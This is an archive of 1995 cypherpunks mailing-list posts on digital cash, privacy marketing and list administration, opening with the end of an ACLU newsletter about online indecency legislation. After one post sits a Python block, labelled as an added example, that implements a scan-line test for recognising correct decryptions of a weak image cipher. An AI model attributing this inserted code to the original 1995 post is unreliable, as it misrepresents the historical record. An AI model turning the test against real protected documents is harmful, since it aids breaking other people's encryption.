Pressler, Larry (South Dakota)
Stevens, Ted (Alaska)
McCain, John (Arizona)
Burns, Conrad (Montana)
Gorton, Slade (Washington)
Lott, Trent (Mississippi)

Democrats:

Hollings, Ernest F. (South Carolina)
Inouye, Daniel K. (Hawaii)
Ford, Wendell H. (Kentucky)
Exon, James J. (Nebraska)
Rockefeller, John D. (West Virginia)

For a copy of the online indecency amendments, send a message to
infoaclu@aclu.org with "Online Indecency Amendments" in the
subject line of the message.

For more information on the legislation and what you can do to
fight it, see:
http://epic.org/free_speech
http://www.panix.com/vtw/exon
http://www.eff.org/
http://www.cdt.org/
-----------------------------------------------------------------
*  Search for Plaintiffs Continues in Suit to Challenge Online
Indecency Legislation
     
As noted above, the online community should continue to urge the
conference committee to remove the censorship provisions from the
telco bill.  At the same time, a coalition has formed to organize
litigation to challenge these provisions if they are signed into
law.  

The first step is the selection of plaintiffs.  We need
plaintiffs who use online networks to discuss or distribute works
of art, literary classics, sex education, gay and lesbian
literature, human rights  reporting, abortion information, rape
counseling, controversial political speech, or any other material
that could be deemed "indecent" and therefore illegal under the
proposed law.

We received a tremendous response to our first call for
plaintiffs, in the last issue of the ACLU Cyber-Liberties Update. 
Thanks to all the organizations who contacted us.  We urge other
groups to join the battle to save free speech in cyberspace.

Please contact Ann Beeson at the ACLU if your organization is
interested in being a plaintiff in this ground-breaking
litigation that will define First Amendment rights in cyberspace. 
212-944-9800 x788, beeson@aclu.org.
-----------------------------------------------------------------
*  Effect of Telco Bill on Universal Access

In addition to the online censorship provisions in the telco 
bill, the ACLU is seriously concerned about the effect of 
other provisions in the bill on universal access.

For more information about the effect of the telco bill on 
universal access and other public interest matters, see 
the Ad Hoc Site Against the Telecommunications Bill, 
co-sponsored by Center for Media Education, Computer 
Professionals for Social Responsibility, Consumer 
Federation of America, Electronic Privacy Information 
Center, Media Access Project, People for the American 
Way, and Taxpayer Assets Project, at 
http://www.access.digex.net:80/~cme/bill.html.
-----------------------------------------------------------------
CONFERENCES
-----------------------------------------------------------------
Oct 26, 5 pm: "Law in Cyberspace: Free Expression and
Intellectual Property on the Internet," Georgetown University Law
Center, 600 New Jersey NW, Gewirz Conference Room, Gewirz Hall. 
Co-sponsored by ACLU-GULC and Student Intellectual Property Law
Association.  Panelists include David Post (GULC Law professor
and author of column on cyberspace law in American Lawyer); John
Podesta (GULC professor and former senior policy advisor to
President Clinton on govt information policy); and David Johnson
(co-founder of the Cyberspace Law Institute, President of Lexis
Counsel Connect).

Nov 3, 8 pm:  John Perry Barlow on "Creating Cyberculture," Kane
Hall - University of Washington in Seattle.  $12 ($10 students).  
The lecture is part of a series, co-sponsored by the ACLU of 
Washington, that explores the impact and implications of the 
technology revolution on art and culture.  Other cosponsors include 
911 Media Arts Center, the University of Washington's New Media 
Lab, and the University of Washington Technical Communications 
Department.

Nov 16, 5 pm: Nadine Strossen (National President, ACLU) speaks
on "Defending Pornography: A Feminist Perspective on New
Technologies and Old-Fashioned Sex," GULC, 600 New Jersey NW,
12th Floor Ballroom, Gewirz Hall.  Co-sponsored by ACLU-GULC and
the Student Bar Association Speakers Fund.
-----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU
-----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under
construction at http://www.aclu.org.  In the meantime, you can
retrieve ACLU documents via gopher at gopher://aclu.org:6601
(forgive the less-than-updated state of our gopher -- we've
devoted all our resources to WWW construction!).  If you're on
America Online, check out the live chats, auditorium events,
*very* active message boards, and complete news on civil
liberties, at keyword ACLU.
-----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a 
message to infoaclu@aclu.org with "subscribe Cyber-Liberties 
Update" in the subject line of your message.  To terminate 
your subscription, send a message to infoaclu@aclu.org with 
"unsubscribe Cyber-Liberties Update" in the subject line.

For general information about the ACLU, write to
infoaclu@aclu.org.
-----------------------------------------------------------------
**PLEASE REPOST WITH HEADER INTACT**




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 25 Oct 95 14:08:48 PDT
To: cypherpunks@toad.com
Subject: Payments FAQ
In-Reply-To: <308E88FD-00000001@valhalla.gte.com>
Message-ID: <9510252108.AA20191@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	I'm getting overloaded by requests as to where various 
payments info happens to be. Here is the URL of an overview I produced.

http://www.w3.org/hypertext/WWW/Payments/roadmap.html

You can find SEPP from here and most other schemes, even Magic
Money for cypherpunks aficionados.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 25 Oct 95 00:17:16 PDT
To: alano@teleport.com (Alan Olsen)
Subject: Re: CJR returned to sender [NOISE][Noise][noise]
In-Reply-To: <199510250602.XAA20850@desiree.teleport.com>
Message-ID: <199510250711.RAA10267@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Alan Olsen <alano@teleport.com>
  and raph@cs.berkeley.edu

> At 10:13 PM 10/24/95 -0700, you wrote:
> >   I got the CJR back today, envelope unopened (although the corner was
> >torn so you could see there were t-shirts inside). "Returned to sender",
> >it said, "Refused___, Unclaimed___".
...
> That is what you get for warning people in advance!  (I would say that they
> "skirted" the issue, but that is not a-dress-ed here...) Maybe they read the
   ^^^^^^^

You mean steam open the package, cut up the T-shirts and make them
into skirts?

Now that *would* be strange.

> list and knew what you were up to. Why else would they refuse free t-shirts?
> (Or maybe they had already talked with Netscape that week...) ];>


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMI3jKixV6mvvBgf5AQHjhQQAxDjtSHFvyrkS2RUpAyY2R8J5KaW4YmGp
5W4WSagU5eouzIUpYHBHteNSWYGlP0R4Tv+idH+kzeaLL+eJyQrfHjzLa5wmbuV2
iJ+fdUbYeYcBpWcdEbsQGkQCuAy/UEdo9xzXJNulrNBqTWqoDneHf2tY+rcfYDyS
PP5yfgLUGZc=
=j0wv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 25 Oct 95 00:37:58 PDT
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510240750.IAA04175@utopia.hacktic.nl>
Message-ID: <199510250737.RAA10407@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com

...
> I think the most interesting hack to pursue is to eliminate the
> payee-nonanonymity problem.
...
 
> The  <--(blinding)--- payer <--(blinding)--- payee
> Bank --(unblinding)-> payer --(unblinding)-> payee --> payee spends money

The payer would want to check the proto-coins for values which show
through the blinding. Are there any such values?

To guard against unknown possibilities in this area, the payer might
want to check that the proto-coins are valid (at least).

...
> Privacy for all involved.

How about the bank?

Given that the thing's patented, the bank might conceivably wish
to remain anonymous :-)


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMI3pNixV6mvvBgf5AQGWRgP/fiv5UlZ/9V5qavCNdLzxJr0/M0M4lTCN
ITx8nsGBr7kt345v55LP63nQB54tvp8Zpx1BWtkYDN4WyHdF/+wnziCP2AMVUDhI
ZX9fG1p8WjCg8eqsboQmeerLCDq5oR7ic0ui86jU0nW4jJ4aLwnoXCCdHyEsi5oR
qCZnNG43JhY=
=YNgV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Wed, 25 Oct 95 18:15:15 PDT
To: dnew@sgf.fv.com (Darren New)
Subject: Re: DigiCash
In-Reply-To: <Pine.3.89.9510240909.C1481-0100000@sgf.fv.com>
Message-ID: <199510260038.RAA21478@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Darren New:
> If I give you a dollar for an online newspaper and the 
> newspaper never gets to me, or I give you $50 for a textbook and the 
> textbook never shows up in the mail weeks later, who do I go to to get my 
> money back?

This is a bad-case scenario, since it involves long delay and
delivery of goods that, unlike information, have a nontrivial
marginal cost to the merchant.  These both give the merchant
incentive to skip the delivery step.  For this kind of business, 
there are several possibilities, none of which  is mature enough
to have actually been deployed yet (which is why ecash is currently 
aimed at small, immediately delivered goods and services).

* Escrow services, which take responsibility for delivery each
way (and develop a public reputation for reliably doing this).
This has the value that it still allows the parties to be mutually
anonymous (although additional tools are needed to actually
have strongly anonymous connections, the payment/delivery protocol 
doesn't preclude it).
* Ripped bill protocols might be able to substitute for escrows.
(these are quite esoteric, but can again be hidden behind a nice
metaphor).
* Deal only with a jurisdictionally reachable merchant and hope the
law is on your side (often not an available solution on the global 
Internet, but usually assumed by identified payment schemes, so
it's a reasonable fallback from that point of view).

For smaller transactions with rapid delivery times, complaining 
loudly and publicly on Usenet will soon put the business out of it.
Receipts will give such complaints more credibility, and will also
allow the clearing agent to credibly get involved.  (Obviously
in these cases anonymity is lost for a particular transaction,
but unlinkability with one's unchallenged transactions remains).
Finally, in a few markets the value add of confidentiality is enough 
to outweigh the risks for even large transactions.

Nick Szabo				szabo@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Wed, 25 Oct 95 14:54:26 PDT
To: Steve <privsoft@ix.netcom.com>
Subject: Re: Re: Reformated: How secure....
In-Reply-To: <199510241425.HAA20039@ix3.ix.netcom.com>
Message-ID: <9510252154.AA01706@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Further, descrambling entails moving tiles and recognition of
> readable text.

Why do you make this claim?  If PrivaSoft's transposition cipher is
even superficially ok, a wrong-key decryption will look like a random
permutation of the input pixels, i.e. an image with the same
black/white statistics as the original (a slight weakness, IMHO) but
with none of its spatial coherence.  Look at the distribution of run
lengths, or of the size of connected components.  

I just went and looked at your "PrivaSoft in action" example, and I'd
have to say that the cipher is not "superficially ok".  The ciphertext
is visibly structured: there are visible fragments of letters (an "e",
an "n", a "k", the top of an "S"); there are evenly-spaced vertical
lines of dashes and crosses; I can see the bold text of the original
(what's more, it's only diffused over a small extent, not the whole
ciphertext); and, um, was the letterhead text supposed to be
unreadable, or just dirtied up a little?

Since the algorithm doesn't break up small-scale structure very well,
a more robust way of testing for correct decryption would be to
count the number of black pixels on each scan line, and examine this
for periodicity.  Even with some noise and scan skew, there will be
obvious periodicity for unencrypted text, and little for an incorrect
decipherment.

I don't mean to be unnecessarily hard on your software.  It's probably
fine against casually nosy people and for protecting mildly
embarrassing information, and it's conveniently exportable.  But if you
represent it as suitable for high-value secrets, you're misleading
your customers.

--
   Eli Brandt
   eli+@cs.cmu.edu
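
The scan-line test described in the message above, as an added example
that is not part of the original post and is not PrivaSoft's code. The
page is a constructed synthetic bitmap, all function names are
hypothetical, and a wrong-key decryption is modelled as a uniform random
permutation of the pixels (the "superficially ok" case).

```python
import random


def make_text_page(height=120, width=200, line_pitch=12, glyph_rows=7, seed=1):
    """Constructed stand-in for a scanned page of text: every line_pitch rows
    there is a band of glyph_rows inked rows, separated by near-white gaps."""
    rng = random.Random(seed)
    page = []
    for y in range(height):
        in_text = (y % line_pitch) < glyph_rows
        density = 0.35 if in_text else 0.01  # assumed ink densities
        page.append([1 if rng.random() < density else 0 for _ in range(width)])
    return page


def permute_pixels(page, seed):
    """Model of a wrong-key decryption under an ideal transposition cipher:
    the same pixels, in a uniformly random order."""
    h, w = len(page), len(page[0])
    flat = [px for row in page for px in row]
    random.Random(seed).shuffle(flat)
    return [flat[i * w:(i + 1) * w] for i in range(h)]


def degrade(page, flip_prob=0.05, skew_rows=3, seed=2):
    """Add scan noise (random pixel flips) and skew (columns further right are
    read from rows further down, as on a slightly rotated scan)."""
    rng = random.Random(seed)
    h, w = len(page), len(page[0])
    out = []
    for y in range(h):
        row = []
        for x in range(w):
            src = page[(y + x * skew_rows // w) % h][x]
            row.append(src ^ 1 if rng.random() < flip_prob else src)
        out.append(row)
    return out


def black_count(page):
    """Total black pixels; a transposition cipher cannot change this."""
    return sum(sum(row) for row in page)


def row_profile(page):
    """Number of black pixels on each scan line."""
    return [sum(row) for row in page]


def autocorrelation(profile, lag):
    """Normalised autocorrelation of the scan-line profile at one lag."""
    n = len(profile)
    mean = sum(profile) / n
    var = sum((v - mean) ** 2 for v in profile)
    if var == 0:
        return 0.0
    cov = sum((profile[i] - mean) * (profile[i + lag] - mean)
              for i in range(n - lag))
    return cov / var


def periodicity_score(page, min_lag=4):
    """Return (best_lag, score): the lag with the strongest autocorrelation.
    min_lag skips the trivial correlation between adjacent scan lines."""
    profile = row_profile(page)
    lags = range(min_lag, len(profile) // 3 + 1)
    best = max(lags, key=lambda k: autocorrelation(profile, k))
    return best, autocorrelation(profile, best)


def looks_like_text(page, threshold=0.5):
    """Decision rule: strong periodicity in the profile means readable text."""
    return periodicity_score(page)[1] > threshold


if __name__ == "__main__":
    page = make_text_page()
    wrong = permute_pixels(page, seed=7)
    for name, img in (("plaintext", page),
                      ("noisy, skewed plaintext", degrade(page)),
                      ("wrong-key output", wrong)):
        lag, score = periodicity_score(img)
        print(f"{name:24s} black={black_count(img):5d} lag={lag:2d} score={score:.2f}")
```

The black-pixel totals of the plaintext and the permuted image are
identical, which is the preserved statistic the message calls a slight
weakness; only the plaintext shows a peak at the line pitch.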



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Wed, 25 Oct 95 18:31:43 PDT
To: cypherpunks@toad.com
Subject: Privacy Marketing
Message-ID: <199510260058.RAA27936@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Most Internet businesses, especially the Web software and
payment systems providers, are severely underestimating the market
for privacy features that is out there.  Consider: 

* A recent general survey showed that 83% of Americans are very 
concerned about their privacy on the "Information Superhighway".
One can expect even stronger figures from European customers, which
have more first-hand experience with private data, much of it
originally compiled for innocuous reasons, being used for
political repression.  The vast majority of our customers are
concerned about privacy.

* Marketing surveys on privacy that are both detailed and accurate
are hard to come by, because customers who care more about their privacy 
tend to dislike filling out detailed forms (even if they claim to be 
anonymous).

* Over half the BBS, and potentially the Internet, online service market
is in controversial services, where customers are even more concerned
about privacy than average.

* Privacy, once considered merely a political issue, is now being recognized 
for its more important aspect, as a market differentiator and value-add.
Marketers correctly recognize that government "privacy regulations" mean 
much less privacy for businesses if it is to be enforced, and the voters no
longer expect such laws to have any teeth in the face of modern
technology.  That hardly means that customers are not concerned about it, as
the numbers show.  The alternative to regulation is market solutions.
Recognize that many customers do want privacy, give them what they want, 
and contrast yourself to your competitor. Making visible the ways your 
competitor is violating their customers' privacy will become a powerful 
marketing strategy.  This strategy was used rather timidly, and inaccurately,
by AT&T against MCI, where it nevertheless had great success.  (Inaccurate
because all major phone companies compile lists of who calls whom,
and use them for marketing as well as billing -- MCI was simply being more 
honest about it).  Used boldly and accurately, privacy marketing has 
vast potential to upset competitors who rely too much on marketing 
data and not enough on empathy with the human customer.  For an idea
of what such a marketing campaign might be like, imagine combining
Apple "1984" Mac ads, one of the most effective campaigns in history,
with the AT&T vs. MCI campaign, to sell products and services that 
in fact do protect customer privacy where the competition does not.  

* Most Americans do _not_ participate in frequent flier and similar
customer tracking programs.  Many who do participate don't realize
the extent to which their lifestyle is tracked, since these actions
are performed on remote databases, well hidden from the customer.
If customers aren't concerned about their privacy, then why the need for 
all the distracting gimmicks and giveaways?  Why not just promote these 
programs straightforwardly to the customer as "Customer Tracking 
Programs"?  A competitor who can provide a privacy protecting solution
can do just that, damaging these tracking programs severely.

* It is ludicrous to argue that cash transactions, which leave no
identified paper trail, provide no practical privacy.  In fact they
prevent detailed compilation of lifestyle habits, by (a) not
depending on identity to settle the transaction, (b) making
identity tracking, where it occurs, a visible, separate process, and 
(c) making it too expensive to track identity via the payment system itself,
except in extreme, very rare cases.  In practice, this means that cash 
customers don't get their lifestyles described in detail in remote 
databases, while non-confidential electronic payers increasingly do.  
Eventually this sharp difference in outcome will feed back to the 
customer, greatly increasing the demand for cash over non-confidential
electronic payment.

* A big challenge for vendors value-adding privacy is to accurately 
communicate these privacy features, through both the user interface and their
marketing, while debunking fraudulent claims (such as calling 
non-confidential payment systems "cash") and exposing the privacy
violating actions of their competitors.

I conclude that privacy marketing will be an important value-add for
Internet commerce.  It will be a terrific way to gain market share at 
the expense of the competition  -- or to lose much of your market share, 
if you find yourself on the wrong end of a privacy campaign.


Nick Szabo				szabo@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 25 Oct 95 15:02:45 PDT
To: cypherpunks-owner@toad.com
Subject: [ADMIN] Re: Welcome to cypherpunks
In-Reply-To: <9510251917.AA27873@toad.com>
Message-ID: <Pine.SOL.3.91.951025175202.17438A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Oct 1995 Majordomo@toad.com wrote:

> --
> 
> Welcome to the cypherpunks mailing list!
> 

Having received this message from majordomo@toad.com and seeing an 
apparent return of the mail-multiplication problem of recent days, I am 
beginning to suspect that some bozo has subscribed the c-punx list to the 
c-punx list.  A curse upon them and for good measure, a recurse upon them.

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 25 Oct 95 18:19:00 PDT
To: cypherpunks@toad.com, gnu
Subject: Re: [ADMIN] Re: Welcome to cypherpunks
In-Reply-To: <Pine.SOL.3.91.951025175202.17438A-100000@welchlink.welch.jhu.edu>
Message-ID: <9510260118.AA07260@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> beginning to suspect that some bozo has subscribed the c-punx list to the 
> c-punx list.  A curse upon them and for good measure, a recurse upon them.

It's true, for a period of about 45 minutes today, someone subscribed
the Cypherpunks list to itself.  This resulted in a small number of
looped messages.

Also in today's bogus news, a rather testy newbie, Arthur Germain,
subscribed at 8AM Tuesday.  He had unsubscribed by 3PM Tuesday, but
when he got another twenty or thirty messages (that had been sent to
cypherpunks while he was a subscriber, but which hadn't reached him
yet), he forwarded each of them back to the mailing list.  You may or
may not have seen some of these; I killed off further distribution.

	John Gilmore
	assistant in charge of burping Majordomo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Wed, 25 Oct 95 15:43:26 PDT
To: Majordomo@toad.com
Subject: Re: Welcome to cypherpunks
Message-ID: <9509258146.AA814672676@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     Why am I getting this when I am already subscribed to the list??????
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Welcome to cypherpunks
Author:  Majordomo@toad.com at internet
Date:    25-10-95 12:17


--
     
Welcome to the cypherpunks mailing list!
     
If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command 
in the body of your email message:
     
    unsubscribe cypherpunks cypherpunks@toad.com
     
Here's the general information for the list you've 
subscribed to, in case you don't already have it:
     
     
     
About cypherpunks
-----------------
     
I. Administrivia (please read, boring though it may be)
     
The cypherpunks list is a forum for discussing personal defenses for 
privacy in the digital domain.  It is a high volume mailing list.  If 
you don't know how to do something, like unsubscribe, send mail to
     
 majordomo@toad.com
     
and the software robot which answers that address will send you back 
instructions on how to do what you want.  If you don't know the 
majordomo syntax, an empty message to this address will get you a help 
file, as will a command 'help' in the body.  Even with all this 
automated help, you may still encounter problems.  If you get really 
stuck, please feel free to contact me directly at the address I use 
for mailing list management:
     
 cypherpunks-owner@toad.com
     
Please use this address for all mailing list management issues.  Hint: 
if you try to unsubscribe yourself from a different account than you 
signed up for, it likely won't work.  Log back into your old account 
and try again.  If you no longer have access to that account, mail me 
at the list management address above.
     
For other questions, my list management address is not the best place, 
since I don't read it every day.  To reach me otherwise, send mail to
     
 eric@remailer.net
     
This address is appropriate for emergencies (and wanting to get off 
the list is never an emergency), such as the list continuously spewing 
articles.  Please don't send me mail to my regular mailbox asking to 
be removed; I'll just send you back a form letter.
     
Do not mail to the whole list asking to be removed.  It's rude.  The 
-request address is made exactly for this purpose.
     
To post to the whole list, send mail to
     
 cypherpunks@toad.com
     
If your mail bounces repeatedly, you will be removed from the list. 
Nothing personal, but I have to look at all the bounce messages.
     
There is no digest version available.
     
There is an announcements list which is moderated and has low volume. 
Announcements for physical cypherpunks meetings, new software and 
important developments will be posted there.  Mail to
     
 cypherpunks-announce-request@toad.com
     
if you want to be added or removed to the announce list.  All 
announcements also go out to the full cypherpunks list, so there is no 
need to subscribe to both.
     
     
II. About cypherpunks
     
The cypherpunks list is not designed for beginners, although they are 
welcome.  If you are totally new to crypto, please get and read the 
crypto FAQ referenced below.  This document is a good introduction, 
although not short.  Crypto is a subtle field and a good understanding 
will not come without some study.  Please, as a courtesy to all, do some 
reading to make sure that your question is not already frequently asked.
     
There are other forums to use on the subject of cryptography.  The 
Usenet group sci.crypt deals with technical cryptography; cypherpunks 
deals with technical details but slants the discussion toward their 
social implications.  The Usenet group talk.politics.crypto, as it 
says, is for political theorizing, and cypherpunks gets its share of 
that, but cypherpunks is all pro-crypto; the debates on this list are 
about how to best get crypto out there.  The Usenet group 
alt.security.pgp is a pgp-specific group, and questions about pgp as 
such are likely better asked there than here.  Ditto for 
alt.security.ripem.
     
The cypherpunks list has its very own net.loon, a fellow named L. 
Detweiler.  The history is too long for here, but he thinks that 
cypherpunks are evil incarnate.  If you see a densely worded rant 
featuring characteristic words such as "medusa", "pseudospoofing", 
"treachery", "poison", or "black lies", it's probably him, no matter 
what the From: line says.  The policy is to ignore these postings. 
Replies have never, ever, not even once resulted in anything 
constructive and usually create huge flamewars on the list.  Please, 
please, don't feed the animals.
     
     
III. Resources.
     
A. The sci.crypt FAQ
     
anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt
     
The cryptography FAQ is a good online intro to crypto.  Very much worth 
reading.  Last I looked, it was in ten parts.
     
B. cypherpunks ftp site
     
anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks
     
This site contains code, information, rants, and other miscellany. 
There is a glossary there that all new members should download and 
read.  Also recommended for all users are Hal Finney's instructions on 
how to use the anonymous remailer system; the remailer sources are 
there for the perl-literate.
     
C. Bruce Schneier's _Applied Cryptography_, published by Wiley
     
This is required reading for any serious technical cypherpunk.  An 
excellent overview of the field, it describes many of the basic 
algorithms and protocols with their mathematical descriptions.  Some 
of the stuff at the edges of the scope of the book is a little 
incomplete, so short descriptions in here should lead to library 
research for the latest papers, or to the list for the current 
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.
     
     
IV. Famous last words
     
My preferred email address for list maintenance topics only is 
hughes@toad.com.  All other mail, including emergency mail, should go 
to hughes@ah.com, where I read mail much more regularly.
     
Enjoy and deploy.
     
Eric
     
-----------------------------------------------------------------------------
     
Cypherpunks assume privacy is a good thing and wish there were more 
of it.  Cypherpunks acknowledge that those who want privacy must 
create it for themselves and not expect governments, corporations, or 
other large, faceless organizations to grant them privacy out of 
beneficence.  Cypherpunks know that people have been creating their 
own privacy for centuries with whispers, envelopes, closed doors, and 
couriers.  Cypherpunks do not seek to prevent other people from 
speaking about their experiences or their opinions.
     
The most important means to the defense of privacy is encryption. To 
encrypt is to indicate the desire for privacy.  But to encrypt with 
weak cryptography is to indicate not too much desire for privacy. 
Cypherpunks hope that all people desiring privacy will learn how best 
to defend it.
     
Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish 
to learn about it, to teach it, to implement it, and to make more of 
it.  Cypherpunks know that cryptographic protocols make social 
structures.  Cypherpunks know how to attack a system and how to 
defend it.  Cypherpunks know just how hard it is to make good 
cryptosystems.
     
Cypherpunks love to practice.  They love to play with public key 
cryptography.  They love to play with anonymous and pseudonymous mail 
forwarding and delivery.  They love to play with DC-nets.  They love 
to play with secure communications of all kinds.
     
Cypherpunks write code.  They know that someone has to write code to 
defend privacy, and since it's their privacy, they're going to write 
it.  Cypherpunks publish their code so that their fellow cypherpunks 
may practice and play with it.  Cypherpunks realize that security is 
not built in a day and are patient with incremental progress.
     
Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know 
that a widely dispersed system can't be shut down.
     
Cypherpunks will make the networks safe for privacy.
     
[Last updated Mon Feb 21 13:18:25 1994]
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Wed, 25 Oct 95 11:00:34 PDT
To: cypherpunks@toad.com
Subject: crypto and law enforcement
Message-ID: <199510251800.TAA27945@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


In June, four people were arrested for allegedly producing the illegal
newspaper "radikal" in Rheinland-Pfalz, Germany. One of the main
reasons for imprisonment was that they refused to decrypt the disks
found with them.

The Attorney at the Federal Supreme Court now claims that three disks
have been partially decrypted, but does not reveal the texts to the
defense counsel because that could be "a danger to the
investigations". The fact that the accused did not help in decryption
is seen as an indicator for danger of collusion, so they will remain
imprisoned on remand.

It seems that these four people will face several years of
imprisonment mainly because one of them chose a weak passphrase.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 25 Oct 95 11:02:04 PDT
To: cypherpunks@toad.com
Subject: arg
Message-ID: <199510251801.TAA27975@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Frissell:

"The average seasoned citizen pays a higher percentage of his income for
medical expenses today than he did in 1964 before the passage of Medicaid."

      Do you set aside a quiet hour every day to think up this crap?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Oct 95 19:55:34 PDT
To: cypherpunks@toad.com
Subject: Let's Not Merge Mailing Lists, OK?
Message-ID: <acb4444702021004b728@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



There's been an upsurge in "cross-mailed" messages, with Cypherpunks copied
on "www-buy-blah-blah," and vice versa, and Cypherpunks copied on the
growing number of lobbyist lists (EPIC, EFF, etc.). A lot of this is not
new, but some of the cross-posts between our list and the various "Net
commerce" and like groups are causing debates to blur.

This message drove it home for me:

-----begin excerpt-----

From: ali@eit.COM (Ali Bahreman)
Date: Wed, 25 Oct 1995 15:28:00 -0700
To: ali@eit.COM, dnew@sgf.fv.com, www-buyinfo@allegra.att.com, ljo@ausys.se
Subject: Digital Cash, Privacy, Anonymity, Double spending protection and
Cheating protection
Cc: cypherpunks@toad.com
Reply-To: bahreman@eit.COM
X-Sun-Charset: US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Let's think out loud here for a minute...  I am sending this to Cypherpunks to
see if someone out there has already thought of a solution to this.

Alice wants to get a file from Bob and wants to pay him $1 using some Digital
Cash scheme.

- Do we want Alice's identity to remain Anonymous (and Bob's too)? (Note that
  this means that neither party knows who the other really is.  They could be
  using aliases to conceal their real identity.)

... rest of speculations about crypto elided....

----end excerpt----

I don't know if "ali@eit.COM (Ali Bahreman)" is subscribed to the
Cypherpunks list or not. From the nature of his comments, I suspect not.

There is great danger in constantly "casting the net wider," in trying to
reach more and more people. I understand the temptation for some on both
lists to cross-post some messages. I urge that they do this, as Bob H. has
done on occasion, by personally forwarding the message, with only _one_ of
the lists getting it. (This because the real danger is as above, where
multiple lists are in the recipient or cc: fields, and followups semi-spam
multiple lists.)

Clearly we cannot have our list used to educate others on other lists. Or,
rather, I'm finding it hard enough to stay on top of a list with 1200+
subscribers. Adding people from other lists, at varying levels of
competence in areas we think important, will simply be too much.

For me, at least.

For now, I plan to filter out stuff that gets echoed over from www-buy, as
I can't keep track of their conversations as well as our own.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: QLDM75A@prodigy.com (MR ELDON B JENKINS)
Date: Wed, 25 Oct 95 18:16:38 PDT
To: cypherpunks@toad.com
Subject: The real value of munition t-shirts (Re:
Message-ID: <013.03574796.QLDM75A@prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


> I've found that the real value of my shirt is the fact that it's
> a valuable cypherpunk detector device for strangers who have come
> up to me and said, "Wow!  Is that the shirt I've heard so much about.. are
> you really a cypherpunk... hey there nice perl... " etc. etc. etc.  I've
> been approached about it at a Taco Bell, at the movies, and
> at a favorite coffee house of mine (several times, in fact).  One night I
